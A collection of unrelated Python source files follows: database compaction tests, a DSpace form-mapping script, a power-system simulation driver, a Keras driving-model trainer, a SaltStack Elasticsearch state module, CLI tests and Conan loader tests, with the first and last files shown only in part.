while fragmentation_monitor.state != "FINISHED":
self._load_all_buckets(self.master, self.gen_load, "update", 0)
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, {})
fragmentation_monitor.result()
time.sleep(10)
new_comp_rev, fragmentation = self._get_compaction_details(rest, self.default_bucket_name, ddoc.name)
self.log.info("Stats Compaction Rev and Fragmentation After Compaction is ({0}) ({1})".format(new_comp_rev, fragmentation))
if new_comp_rev > comp_rev:
self.log.info("Compaction triggered successfully")
else:
try:
compaction_task = self.cluster.async_monitor_compact_view(self.master, ddoc.name, frag_value=percent_threshold)
compaction_task.result()
except Exception, ex:
self.fail(ex)
def _get_compaction_details(self, rest, bucket, design_doc_name):
total_fragmentation = 0
status, content = rest.set_view_info(bucket, design_doc_name)
curr_no_of_compactions = content["stats"]["compactions"]
total_disk_size = content['disk_size']
total_data_size = content['data_size']
if total_disk_size > 0 and total_data_size > 0:
total_fragmentation = \
(total_disk_size - total_data_size) / float(total_disk_size) * 100
return (curr_no_of_compactions, total_fragmentation)
def _monitor_view_fragmentation(self):
query = {"connectionTimeout" : "60000", "full_set" : "true", "stale" : "false"}
end_time = time.time() + self.wait_timeout * 30
for ddoc in self.ddocs:
fragmentation_monitor = self.cluster.async_monitor_db_fragmentation(self.master,
self.fragmentation_value, self.default_bucket_name, True)
while fragmentation_monitor.state != "FINISHED" and end_time > time.time():
self._load_all_buckets(self.master, self.gen_load, "update", 0)
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, query)
result = fragmentation_monitor.result()
self.assertTrue(result, "impossible to reach compaction value {0} after {1} sec".
format(self.fragmentation_value, (self.wait_timeout * 30)))
def _compaction_thread(self):
threads = []
threads.append(StoppableThread(target=self.load_view_fragmentation, name="view_Thread", args=()))
threads.append(StoppableThread(target=self.load_DB_fragmentation, name="DB_Thread", args=()))
for thread in threads:
thread.start()
while True:
if not threads:
break
else:
self._load_all_buckets(self.master, self.gen_load, "update", 0)
self.thread_stopped.wait(60)
threads = [d for d in threads if d.is_alive()]
self.log.info("Current amount of threads %s" % len(threads))
self.thread_stopped.clear()
|
py | b41525cd0eace9d7f108782ff33cf01e394aa66d | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Projeto FUNASA
Cria formato para o arquivo input-forms.xml, referente a colecao e qual formuário deverá ser utilizado
Fabio Luis de Brito - 20191114
Execução:
python cria_handle_colecao_formulario.py
'''
import requests
URL_t="http://rcfunasa.bvsalud.org/rest/collections?offset=0&limit=1000"
# Executado consulta
r_t = requests.get(URL_t)
# Armazenando conteudo em 'data_t'
data_t = r_t.json()
for item in data_t:
name=item['name'].encode('utf-8')
handle=item['handle']
# Legislação - legi
if name=='Normativos':
texto=' <name-map collection-handle="' + handle + '" form-name="legi" />'
if name=='Políticas, Planejamento, Gestão e Projetos' or name == 'Produção Científica':
texto=' <name-map collection-handle="' + handle + '" form-name="pppp" />'
if name=='Produção Educacional':
texto=' <name-map collection-handle="' + handle + '" form-name="lom" />'
if name=='Produção Informacional e/ou Multimídia':
texto=' <name-map collection-handle="' + handle + '" form-name="multimedia" />'
print texto
|
py | b4152633fa71db450785792df2473c319ec1194c | """Developement file that acts as main"""
"""VS may require default ironpython environment (no bit declaration)"""
import os
import subprocess
import signal
import __builtin__
# workaround for interactive mode runs (Use only if required)
print(os.getcwd())
os.chdir(r"C:\Users\heyth\source\repos\thadhaines\LTD_sim")
#os.chdir(r"D:\Users\jhaines\Source\Repos\thadhaines\LTD_sim")
#print(os.getcwd())
from parseDyd import *
from distPe import *
from combinedSwing import *
from findFunctions import *
from PerturbanceAgents import *
from pgov1Agent import *
from CoreAgents import AreaAgent, BusAgent, GeneratorAgent, SlackAgent, LoadAgent
from Model import Model
from makeModelDictionary import makeModelDictionary
from saveModelDictionary import saveModelDictionary
execfile('mergeDicts.py')
simNotes = """
20 MW load step at t=2
sim time = 20 seconds,
changed slackTol to 0.25. Timestep = 1
"""
# Simulation Parameters Dictionary
simParams = {
'timeStep': 1.0,
'endTime': 20.0,
'slackTol': .25,
'Hsys' : 0.0, # MW*sec of entire system, if !> 0.0, will be calculated in code
'Dsys' : 0.0, # PU; TODO: Incoroporate into simulation (probably)
# Mathematical Options
'freqEffects' : 0, # w in swing equation will not be assumed 1 if this is true
'integrationMethod' : 'Euler',
# Data Export Parameters
'fileDirectory' : #r"\\verification\\noGovLoadStep\\loadStepDown\\", # relative path must exist before simulation
r"\\verification\\noGovLoadStep\\loadStepUp\\",
'fileName' : 'noGov',
'exportDict' : 1,
'exportMat': 1, # requies exportDict == 1 to work
}
# fast debug case switching
# TODO: enable new dyd replacement
test_case = 0
if test_case == 0:
savPath = r"C:\LTD\pslf_systems\eele554\ee554.sav"
dydPath = [r"C:\LTD\pslf_systems\eele554\ee554.exc.dyd",
#r"C:\LTD\pslf_systems\eele554\ee554.ltd.dyd",
]
elif test_case == 1:
savPath = r"C:\LTD\pslf_systems\MicroWECC_PSLF\microBusData.sav"
dydPath = [r"C:\LTD\pslf_systems\MicroWECC_PSLF\microDynamicsData_LTD.dyd"]
elif test_case == 2:
savPath = r"C:\LTD\pslf_systems\MiniPSLF_PST\dmini-v3c1_RJ7_working.sav"
dydPath = [r"C:\LTD\pslf_systems\MiniPSLF_PST\miniWECC_LTD.dyd"]
elif test_case == 3:
# Will no longer run due to parser errors
savPath = r"C:\LTD\pslf_systems\fullWecc\fullWecc.sav"
dydPath = [r"C:\LTD\pslf_systems\fullWecc\fullWecc.dyd"]
# Required Paths
locations = {
# full path to middleware dll
'fullMiddlewareFilePath': r"C:\Program Files (x86)\GE PSLF\PslfMiddleware" ,
# path to folder containing PSLF license
'pslfPath': r"C:\Program Files (x86)\GE PSLF",
'savPath' : savPath,
'dydPath': dydPath,
}
del savPath, dydPath
# these files will change after refactor, required after locations definition
execfile('initPSLF.py')
execfile('makeGlobals.py')
# mirror arguments: locations, simParams, debug flag
mir = Model(locations, simParams, 1)
# Pertrubances configured for test case (eele)
# step up and down (pgov test)
#mir.addPert('Load',[3],'Step',['P',2,101]) # quick 1 MW step
#mir.addPert('Load',[3],'Step',['P',30,100]) # quick 1 MW step
# single steps up or down
#mir.addPert('Load',[3],'Step',['P',2,80]) # step load down to 80 MW
mir.addPert('Load',[3,'2'],'Step',['St',2,1]) # step 20 MW load bus on
mir.runSim()
mir.notes = simNotes
# Terminal display output for immediate results
print("Log and Step check of Load, Pacc, and sys f:")
print("Time\tSt\tPacc\tsys f\tdelta f\t\tSlackPe\tGen2Pe")
for x in range(mir.c_dp-1):
print("%d\t%d\t%.2f\t%.5f\t%.6f\t%.2f\t%.2f" % (
mir.r_t[x],
mir.Load[0].r_St[x],
mir.r_ss_Pacc[x],
mir.r_f[x],
mir.r_deltaF[x],
mir.Slack[0].r_Pe[x],
mir.Machines[1].r_Pe[x],))
print('End of simulation data.')
# Data export
if simParams['exportDict']:
# Change current working directory to data destination.
cwd = os.getcwd()
if simParams['fileDirectory'] :
os.chdir(cwd + simParams['fileDirectory'])
dictName = simParams['fileName']
D = makeModelDictionary(mir)
savedName = saveModelDictionary(D,dictName)
os.chdir(cwd)
if simParams['exportMat']:
# use cmd to run python 3 32 bit script...
cmd = "py -3-32 makeMat.py " + savedName +" " + dictName + " "+ simParams['fileDirectory']
matProc = subprocess.Popen(cmd)
matReturnCode = matProc.wait()
matProc.send_signal(signal.SIGTERM)
# attempts to delete .pkl file fails -> in use by another process, reslove?
#del matProc
#os.remove(savedName)
#print('%s Deleted.' % savedName)
# raw_input("Press <Enter> to Continue. . . . ") # Not always needed to hold open console |
py | b41526596dd806ff0166425831691b52bcb94ca1 | import sklearn
from sklearn.model_selection import train_test_split
from keras import Sequential, optimizers
from keras.callbacks import ModelCheckpoint
from keras.optimizers import Adam
from keras.layers import Flatten, Dense, Conv2D, Lambda, Cropping2D, Dropout, LeakyReLU
from random import shuffle, randint
import numpy as np
import cv2
import csv
import os
# Load data
# '../DrivingData02/
def loadData(path, changePathinCSV=False):
samples = []
if changePathinCSV:
with open(path + 'driving_log.csv') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
path = line[0]
path_l = line[1]
path_r = line[2]
filename = path.split('/')[-1]
filename_l = path_l.split('/')[-1]
filename_r = path_r.split('/')[-1]
line[0] = path + 'IMG/' + filename
line[1] = path + 'IMG/' + filename_l
line[2] = path + 'IMG/' + filename_r
samples.append(line)
else:
with open(path + 'driving_log.csv') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
samples.append(line)
samples = sklearn.utils.shuffle(samples)
return samples
def randomDarkener(image):
alpha = 1
beta = randint(-30, 0)
res = cv2.addWeighted(image, alpha, np.zeros(
image.shape, image.dtype), 0, beta)
return res
def generator(samples, batch_size=32):
num_samples = len(samples)
while 1: # Loop forever so the generator never terminates
shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
images = []
angles = []
for batch_sample in batch_samples:
for i in range(3):
name = batch_sample[i].strip()
if os.path.isfile(name):
image = cv2.cvtColor(
cv2.imread(name), cv2.COLOR_BGR2RGB)
else:
image = cv2.imread(name)
exit(1)
angle = float(batch_sample[3])
if i == 1:
angle += 0.20
if i == 2:
angle -= 0.20
images.append(image)
angles.append(angle)
if i == 0:
image_flipped = np.fliplr(image)
images.append(image_flipped)
measurement_flipped = -angle
angles.append(measurement_flipped)
if randint(0, 1000) % 30 == 0:
image = randomDarkener(image)
images.append(image)
angles.append(angle)
# trim image to only see section with road
X_train = np.array(images)
y_train = np.array(angles)
yield sklearn.utils.shuffle(X_train, y_train)
def CNN(train_samples, validation_samples, batch_size):
model = Sequential()
model.add(Lambda(lambda x: x / 255.0 - 0.5, input_shape=(160, 320, 3)))
model.add(Cropping2D(cropping=((60, 25), (0, 0))))
model.add(Conv2D(24, (5, 5), strides=(2, 2)))
model.add(LeakyReLU(alpha=.01))
model.add(Conv2D(36, (5, 5), strides=(2, 2)))
model.add(LeakyReLU(alpha=.01))
model.add(Conv2D(48, (5, 5), strides=(2, 2)))
model.add(LeakyReLU(alpha=.01))
model.add(Dropout(0.5))
model.add(Conv2D(64, (3, 3)))
model.add(LeakyReLU(alpha=.01))
model.add(Conv2D(64, (3, 3)))
model.add(LeakyReLU(alpha=.01))
model.add(Dropout(0.5))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(100))
model.add(Dense(50))
model.add(Dense(10))
model.add(Dense(1))
model.summary()
return model
def main():
samples = []
# Loading Data from 3 different folders
# Each folder has different runs on simulator
samples += loadData('../DrivingData/')
samples += loadData('../DrivingData02/')
samples += loadData('data/')
print(len(samples))
# Spliting the data between trainnig (80%) and validation (20%)
train_samples, validation_samples = train_test_split(
samples, test_size=0.2)
# Setting the batch size
batch_size = 32
# Getting the model
model = CNN(train_samples, validation_samples, batch_size)
# Running the model, saving only the best models based on validation loss
checkpoint = ModelCheckpoint('model-{epoch:03d}.h5',
monitor='val_loss',
verbose=0,
save_best_only=True,
mode='auto')
model.compile(loss='mse', optimizer=Adam(lr=1.0e-4))
train_generator = generator(train_samples, batch_size=batch_size)
validation_generator = generator(validation_samples, batch_size=batch_size)
model.fit_generator(train_generator, steps_per_epoch=len(train_samples)/batch_size, validation_data=validation_generator,
validation_steps=len(validation_samples)/batch_size, epochs=30, callbacks=[checkpoint])
if __name__ == '__main__':
main()
|
py | b415266769ec4b8275ee64fc2713d922cc214dfe | # -*- coding: utf-8 -*-
'''
Manage Elasticsearch Domains
============================
.. versionadded:: 2016.11.0
Create and destroy Elasticsearch domains. Be aware that this interacts with Amazon's services,
and so may incur charges.
This module uses ``boto3``, which can be installed via package, or pip.
This module accepts explicit vpc credentials but can also utilize
IAM roles assigned to the instance through Instance Profiles. Dynamic
credentials are then automatically obtained from AWS API and no further
configuration is necessary. More information available `here
<http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html>`_.
If IAM roles are not used you need to specify them either in a pillar file or
in the minion's config file:
.. code-block:: yaml
vpc.keyid: GKTADJGHEIQSXMKKRBJ08H
vpc.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
It's also possible to specify ``key``, ``keyid`` and ``region`` via a profile,
either passed in as a dict, or as a string to pull from pillars or minion
config:
.. code-block:: yaml
myprofile:
keyid: GKTADJGHEIQSXMKKRBJ08H
key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
region: us-east-1
.. code-block:: yaml
Ensure domain exists:
boto_elasticsearch_domain.present:
- DomainName: mydomain
- profile='user-credentials'
- ElasticsearchVersion: "2.3"
- ElasticsearchClusterConfig:
InstanceType": "t2.micro.elasticsearch"
InstanceCount: 1
DedicatedMasterEnabled: False
ZoneAwarenessEnabled: False
- EBSOptions:
EBSEnabled: True
VolumeType: "gp2"
VolumeSize: 10
Iops: 0
- AccessPolicies:
Version: "2012-10-17"
Statement:
- Effect: "Allow"
- Principal:
AWS: "*"
- Action:
- "es:*"
- Resource: "arn:aws:es:*:111111111111:domain/mydomain/*"
- Condition:
IpAddress:
"aws:SourceIp":
- "127.0.0.1"
- "127.0.0.2"
- SnapshotOptions:
AutomatedSnapshotStartHour: 0
- AdvancedOptions:
rest.action.multi.allow_explicit_index": "true"
- Tags:
a: "b"
- region: us-east-1
- keyid: GKTADJGHEIQSXMKKRBJ08H
- key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
'''
# Import Python Libs
from __future__ import absolute_import
import logging
import os
import os.path
import json
# Import Salt Libs
import salt.ext.six as six
log = logging.getLogger(__name__)
def __virtual__():
'''
Only load if boto is available.
'''
return 'boto_elasticsearch_domain' if 'boto_elasticsearch_domain.exists' in __salt__ else False
def _compare_json(current, desired):
return __utils__['boto3.json_objs_equal'](current, desired)
def present(name, DomainName,
ElasticsearchClusterConfig=None,
EBSOptions=None,
AccessPolicies=None,
SnapshotOptions=None,
AdvancedOptions=None,
Tags=None,
region=None, key=None, keyid=None, profile=None,
ElasticsearchVersion="1.5"):
'''
Ensure domain exists.
name
The name of the state definition
DomainName
Name of the domain.
ElasticsearchClusterConfig
Configuration options for an Elasticsearch domain. Specifies the
instance type and number of instances in the domain cluster.
InstanceType (string) --
The instance type for an Elasticsearch cluster.
InstanceCount (integer) --
The number of instances in the specified domain cluster.
DedicatedMasterEnabled (boolean) --
A boolean value to indicate whether a dedicated master node is enabled.
See About Dedicated Master Nodes for more information.
ZoneAwarenessEnabled (boolean) --
A boolean value to indicate whether zone awareness is enabled. See About
Zone Awareness for more information.
DedicatedMasterType (string) --
The instance type for a dedicated master node.
DedicatedMasterCount (integer) --
Total number of dedicated master nodes, active and on standby, for the
cluster.
EBSOptions
Options to enable, disable and specify the type and size of EBS storage
volumes.
EBSEnabled (boolean) --
Specifies whether EBS-based storage is enabled.
VolumeType (string) --
Specifies the volume type for EBS-based storage.
VolumeSize (integer) --
Integer to specify the size of an EBS volume.
Iops (integer) --
Specifies the IOPD for a Provisioned IOPS EBS volume (SSD).
AccessPolicies
IAM access policy
SnapshotOptions
Option to set time, in UTC format, of the daily automated snapshot.
Default value is 0 hours.
AutomatedSnapshotStartHour (integer) --
Specifies the time, in UTC format, when the service takes a daily
automated snapshot of the specified Elasticsearch domain. Default value
is 0 hours.
AdvancedOptions
Option to allow references to indices in an HTTP request body. Must be
false when configuring access to individual sub-resources. By default,
the value is true .
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string) that
contains a dict with region, key and keyid.
ElasticsearchVersion
String of format X.Y to specify version for the Elasticsearch domain eg.
"1.5" or "2.3".
'''
ret = {'name': DomainName,
'result': True,
'comment': '',
'changes': {}
}
if ElasticsearchClusterConfig is None:
ElasticsearchClusterConfig = {
'DedicatedMasterEnabled': False,
'InstanceCount': 1,
'InstanceType': 'm3.medium.elasticsearch',
'ZoneAwarenessEnabled': False
}
if EBSOptions is None:
EBSOptions = {
'EBSEnabled': False,
}
if SnapshotOptions is None:
SnapshotOptions = {
'AutomatedSnapshotStartHour': 0
}
if AdvancedOptions is None:
AdvancedOptions = {
'rest.action.multi.allow_explicit_index': 'true'
}
if Tags is None:
Tags = {}
if AccessPolicies is not None and isinstance(AccessPolicies, six.string_types):
try:
AccessPolicies = json.loads(AccessPolicies)
except ValueError as e:
ret['result'] = False
ret['comment'] = 'Failed to create domain: {0}.'.format(e.message)
return ret
r = __salt__['boto_elasticsearch_domain.exists'](DomainName=DomainName,
region=region, key=key, keyid=keyid, profile=profile)
if 'error' in r:
ret['result'] = False
ret['comment'] = 'Failed to create domain: {0}.'.format(r['error']['message'])
return ret
if not r.get('exists'):
if __opts__['test']:
ret['comment'] = 'Domain {0} is set to be created.'.format(DomainName)
ret['result'] = None
return ret
r = __salt__['boto_elasticsearch_domain.create'](DomainName=DomainName,
ElasticsearchClusterConfig=ElasticsearchClusterConfig,
EBSOptions=EBSOptions,
AccessPolicies=AccessPolicies,
SnapshotOptions=SnapshotOptions,
AdvancedOptions=AdvancedOptions,
ElasticsearchVersion=str(ElasticsearchVersion),
region=region, key=key,
keyid=keyid, profile=profile)
if not r.get('created'):
ret['result'] = False
ret['comment'] = 'Failed to create domain: {0}.'.format(r['error']['message'])
return ret
_describe = __salt__['boto_elasticsearch_domain.describe'](DomainName,
region=region, key=key, keyid=keyid, profile=profile)
ret['changes']['old'] = {'domain': None}
ret['changes']['new'] = _describe
ret['comment'] = 'Domain {0} created.'.format(DomainName)
return ret
ret['comment'] = os.linesep.join([ret['comment'], 'Domain {0} is present.'.format(DomainName)])
ret['changes'] = {}
# domain exists, ensure config matches
_status = __salt__['boto_elasticsearch_domain.status'](DomainName=DomainName,
region=region, key=key, keyid=keyid,
profile=profile)['domain']
if _status.get('ElasticsearchVersion') != str(ElasticsearchVersion):
ret['result'] = False
ret['comment'] = 'Failed to update domain: version cannot be modified from {0} to {1}.'.format(_status.get('ElasticsearchVersion'), str(ElasticsearchVersion))
return ret
_describe = __salt__['boto_elasticsearch_domain.describe'](DomainName=DomainName,
region=region, key=key, keyid=keyid,
profile=profile)['domain']
_describe['AccessPolicies'] = json.loads(_describe['AccessPolicies'])
# When EBSEnabled is false, describe returns extra values that can't be set
if not _describe.get('EBSOptions', {}).get('EBSEnabled'):
opts = _describe.get('EBSOptions', {})
opts.pop('VolumeSize', None)
opts.pop('VolumeType', None)
comm_args = {}
need_update = False
es_opts = {'ElasticsearchClusterConfig': ElasticsearchClusterConfig,
'EBSOptions': EBSOptions,
'AccessPolicies': AccessPolicies,
'SnapshotOptions': SnapshotOptions,
'AdvancedOptions': AdvancedOptions}
for k, v in six.iteritems(es_opts):
if not _compare_json(v, _describe[k]):
need_update = True
comm_args[k] = v
ret['changes'].setdefault('new', {})[k] = v
ret['changes'].setdefault('old', {})[k] = _describe[k]
if need_update:
if __opts__['test']:
msg = 'Domain {0} set to be modified.'.format(DomainName)
ret['comment'] = msg
ret['result'] = None
return ret
ret['comment'] = os.linesep.join([ret['comment'], 'Domain to be modified'])
r = __salt__['boto_elasticsearch_domain.update'](DomainName=DomainName,
region=region, key=key,
keyid=keyid, profile=profile,
**comm_args)
if not r.get('updated'):
ret['result'] = False
ret['comment'] = 'Failed to update domain: {0}.'.format(r['error'])
ret['changes'] = {}
return ret
return ret
def absent(name, DomainName,
region=None, key=None, keyid=None, profile=None):
'''
Ensure domain with passed properties is absent.
name
The name of the state definition.
DomainName
Name of the domain.
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string) that
contains a dict with region, key and keyid.
'''
ret = {'name': DomainName,
'result': True,
'comment': '',
'changes': {}
}
r = __salt__['boto_elasticsearch_domain.exists'](DomainName,
region=region, key=key, keyid=keyid, profile=profile)
if 'error' in r:
ret['result'] = False
ret['comment'] = 'Failed to delete domain: {0}.'.format(r['error']['message'])
return ret
if r and not r['exists']:
ret['comment'] = 'Domain {0} does not exist.'.format(DomainName)
return ret
if __opts__['test']:
ret['comment'] = 'Domain {0} is set to be removed.'.format(DomainName)
ret['result'] = None
return ret
r = __salt__['boto_elasticsearch_domain.delete'](DomainName,
region=region, key=key,
keyid=keyid, profile=profile)
if not r['deleted']:
ret['result'] = False
ret['comment'] = 'Failed to delete domain: {0}.'.format(r['error']['message'])
return ret
ret['changes']['old'] = {'domain': DomainName}
ret['changes']['new'] = {'domain': None}
ret['comment'] = 'Domain {0} deleted.'.format(DomainName)
return ret
|
py | b41527aad62e59a8adf1626781a7a78572cb3c95 | import os
import shutil
import nose
import tempfile
import unittest
import mock
import lamnfyc.cli
import lamnfyc.utils
import lamnfyc.context_managers
from inspect import getargspec # noqa
import ipdb # noqa
from ipdb.__main__ import def_colors, def_exec_lines # noqa
from IPython import version_info as ipython_version # noqa
from IPython.terminal.interactiveshell import TerminalInteractiveShell # noqa
def _get_debugger_cls():
if ipython_version < (5, 0, 0):
from IPython.core.debugger import Pdb
return Pdb
return TerminalInteractiveShell().debugger_cls
def _init_pdb(context=3):
debugger_cls = _get_debugger_cls()
if 'context' in getargspec(debugger_cls.__init__)[0]:
p = debugger_cls(def_colors, context=context)
else:
p = debugger_cls(def_colors)
p.rcLines += def_exec_lines
return p
ipdb.__main__._init_pdb = _init_pdb
from contextlib import contextmanager
import sys, os
@contextmanager
def redirect_stdout_stderr(stream):
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = stream
sys.stderr = stream
try:
yield
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
class TestApp(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Tests that the base yaml file works as intended
simple = """
packages:
- name: python
version: 2.7.6
environment:
required:
- SUPER_SECRET
defaults:
DEFAULT_ONE: "VALUE_ONE"
DEFAULT_TWO: "VALUE_TWO"
"""
cls.temp_folder = tempfile.mkdtemp()
# Saves everything inside a temporary folder to tests hierarchies
with lamnfyc.context_managers.chdir(cls.temp_folder):
with open('othername.yaml', 'w') as file_obj:
file_obj.write(simple)
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.temp_folder)
def test_install_options(self):
with lamnfyc.context_managers.chdir(self.temp_folder):
# Makes sure that the yaml config file gets created
nose.tools.assert_false(os.path.exists('lamnfyc.yaml'))
with self.assertRaises(SystemExit) as exc:
parsed = lamnfyc.cli.parser().parse_args(['--init'])
# Make sure that we quit "properly"
nose.tools.assert_equals(str(exc.exception), '0')
nose.tools.assert_true(os.path.exists('lamnfyc.yaml'))
# Init environment
parsed = lamnfyc.cli.parser().parse_args(['env'])
nose.tools.assert_equals(parsed.init, False)
nose.tools.assert_equals(parsed.environment, 'env')
nose.tools.assert_in('lamnfyc.yaml', parsed.config)
# Init custom environment config
parsed = lamnfyc.cli.parser().parse_args(['-c' 'othername.yaml', 'env'])
nose.tools.assert_equals(parsed.init, False)
nose.tools.assert_equals(parsed.config, 'othername.yaml')
nose.tools.assert_equals(parsed.environment, 'env')
# Invalid options
# Redirect all the output to /dev/null
with redirect_stdout_stderr(open(os.devnull, 'w')):
# Errors because the file already exists
with self.assertRaises(SystemExit) as exc:
lamnfyc.cli.parser().parse_args(['--init'])
nose.tools.assert_equals(str(exc.exception), '2')
# Environment agument is required
with self.assertRaises(SystemExit) as exc:
lamnfyc.cli.parser().parse_args([''])
nose.tools.assert_equals(str(exc.exception), '2')
# Verbosity value is not vallid
with self.assertRaises(SystemExit) as exc:
lamnfyc.cli.parser().parse_args(['-v' 'NOT_VALID', 'env'])
nose.tools.assert_equals(str(exc.exception), '2')
# Config path is not valid
with self.assertRaises(SystemExit) as exc:
lamnfyc.cli.parser().parse_args(['-c' 'NOT_VALID', 'env'])
nose.tools.assert_equals(str(exc.exception), '2')
|
py | b415282c21509502cd98a1b781aa9677ecb2aa78 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='FooterTExt',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('footer_text', models.CharField(max_length=500)),
],
),
]
|
py | b4152992b261bac26428f3e24a197c1e9d31df3c | import unittest
from conans.client.loader import ConanFileTextLoader, ConanFileLoader
from conans.errors import ConanException
from conans.util.files import save
import os
from conans.model.requires import Requirements
from conans.model.options import OptionsValues
from mock import Mock
from conans.model.settings import Settings
from conans.test.utils.test_files import temp_folder
from conans.model.profile import Profile
from collections import OrderedDict
from mock.mock import call
from conans.client.loader_parse import load_conanfile_class
class ConanLoaderTest(unittest.TestCase):
def inherit_short_paths_test(self):
loader = ConanFileLoader(None, Settings(), Profile())
tmp_dir = temp_folder()
conanfile_path = os.path.join(tmp_dir, "conanfile.py")
conanfile = """from base_recipe import BasePackage
class Pkg(BasePackage):
pass
"""
base_recipe = """from conans import ConanFile
class BasePackage(ConanFile):
short_paths = True
"""
save(conanfile_path, conanfile)
save(os.path.join(tmp_dir, "base_recipe.py"), base_recipe)
conan_file = load_conanfile_class(conanfile_path)
self.assertEqual(conan_file.short_paths, True)
result = loader.load_conan(conanfile_path, output=None, consumer=True)
self.assertEqual(result.short_paths, True)
def requires_init_test(self):
loader = ConanFileLoader(None, Settings(), Profile())
tmp_dir = temp_folder()
conanfile_path = os.path.join(tmp_dir, "conanfile.py")
conanfile = """from conans import ConanFile
class MyTest(ConanFile):
requires = {}
def requirements(self):
self.requires("MyPkg/0.1@user/channel")
"""
for requires in ("''", "[]", "()", "None"):
save(conanfile_path, conanfile.format(requires))
result = loader.load_conan(conanfile_path, output=None, consumer=True)
result.requirements()
self.assertEqual("MyPkg/0.1@user/channel", str(result.requires))
def conanfile_txt_errors_test(self):
# Valid content
file_content = '''[requires}
OpenCV/2.4.10@phil/stable # My requirement for CV
'''
with self.assertRaisesRegexp(ConanException, "Bad syntax"):
ConanFileTextLoader(file_content)
file_content = '{hello}'
with self.assertRaisesRegexp(ConanException, "Unexpected line"):
ConanFileTextLoader(file_content)
file_content = '[imports]\nhello'
with self.assertRaisesRegexp(ConanException, "Invalid imports line: hello"):
ConanFileTextLoader(file_content).imports_method(None)
file_content = '[imports]\nbin, * -> bin @ kk=3 '
with self.assertRaisesRegexp(ConanException, "Unknown argument kk"):
ConanFileTextLoader(file_content).imports_method(None)
def plain_text_parser_test(self):
# Valid content
file_content = '''[requires]
OpenCV/2.4.10@phil/stable # My requirement for CV
OpenCV2/2.4.10@phil/stable #
OpenCV3/2.4.10@phil/stable
[generators]
one # My generator for this
two
[options]
OpenCV:use_python=True # Some option
OpenCV:other_option=False
OpenCV2:use_python2=1
OpenCV2:other_option=Cosa #
'''
parser = ConanFileTextLoader(file_content)
exp = ['OpenCV/2.4.10@phil/stable',
'OpenCV2/2.4.10@phil/stable',
'OpenCV3/2.4.10@phil/stable']
self.assertEquals(parser.requirements, exp)
def load_conan_txt_test(self):
file_content = '''[requires]
OpenCV/2.4.10@phil/stable
OpenCV2/2.4.10@phil/stable
[build_requires]
MyPkg/1.0.0@phil/stable
[generators]
one
two
[imports]
OpenCV/bin, * -> ./bin # I need this binaries
OpenCV/lib, * -> ./lib
[options]
OpenCV:use_python=True
OpenCV:other_option=False
OpenCV2:use_python2=1
OpenCV2:other_option=Cosa
'''
tmp_dir = temp_folder()
file_path = os.path.join(tmp_dir, "file.txt")
save(file_path, file_content)
loader = ConanFileLoader(None, Settings(), Profile())
ret = loader.load_conan_txt(file_path, None)
options1 = OptionsValues.loads("""OpenCV:use_python=True
OpenCV:other_option=False
OpenCV2:use_python2=1
OpenCV2:other_option=Cosa""")
requirements = Requirements()
requirements.add("OpenCV/2.4.10@phil/stable")
requirements.add("OpenCV2/2.4.10@phil/stable")
build_requirements = []
build_requirements.append("MyPkg/1.0.0@phil/stable")
self.assertEquals(ret.requires, requirements)
self.assertEquals(ret.build_requires, build_requirements)
self.assertEquals(ret.generators, ["one", "two"])
self.assertEquals(ret.options.values.dumps(), options1.dumps())
ret.copy = Mock()
ret.imports()
self.assertTrue(ret.copy.call_args_list, [('*', './bin', 'OpenCV/bin'),
('*', './lib', 'OpenCV/lib')])
# Now something that fails
file_content = '''[requires]
OpenCV/2.4.104phil/stable
'''
tmp_dir = temp_folder()
file_path = os.path.join(tmp_dir, "file.txt")
save(file_path, file_content)
loader = ConanFileLoader(None, Settings(), Profile())
with self.assertRaisesRegexp(ConanException, "Wrong package recipe reference(.*)"):
loader.load_conan_txt(file_path, None)
file_content = '''[requires]
OpenCV/2.4.10@phil/stable111111111111111111111111111111111111111111111111111111111111111
[imports]
OpenCV/bin/* - ./bin
'''
tmp_dir = temp_folder()
file_path = os.path.join(tmp_dir, "file.txt")
save(file_path, file_content)
loader = ConanFileLoader(None, Settings(), Profile())
with self.assertRaisesRegexp(ConanException, "is too long. Valid names must contain"):
loader.load_conan_txt(file_path, None)
def load_imports_arguments_test(self):
file_content = '''
[imports]
OpenCV/bin, * -> ./bin # I need this binaries
OpenCV/lib, * -> ./lib @ root_package=Pkg
OpenCV/data, * -> ./data @ root_package=Pkg, folder=True # Irrelevant
docs, * -> ./docs @ root_package=Pkg, folder=True, ignore_case=True, excludes="a b c" # Other
licenses, * -> ./licenses @ root_package=Pkg, folder=True, ignore_case=True, excludes="a b c", keep_path=False # Other
'''
tmp_dir = temp_folder()
file_path = os.path.join(tmp_dir, "file.txt")
save(file_path, file_content)
loader = ConanFileLoader(None, Settings(), Profile())
ret = loader.load_conan_txt(file_path, None)
ret.copy = Mock()
ret.imports()
expected = [call(u'*', u'./bin', u'OpenCV/bin', None, False, False, None, True),
call(u'*', u'./lib', u'OpenCV/lib', u'Pkg', False, False, None, True),
call(u'*', u'./data', u'OpenCV/data', u'Pkg', True, False, None, True),
call(u'*', u'./docs', u'docs', u'Pkg', True, True, [u'"a', u'b', u'c"'], True),
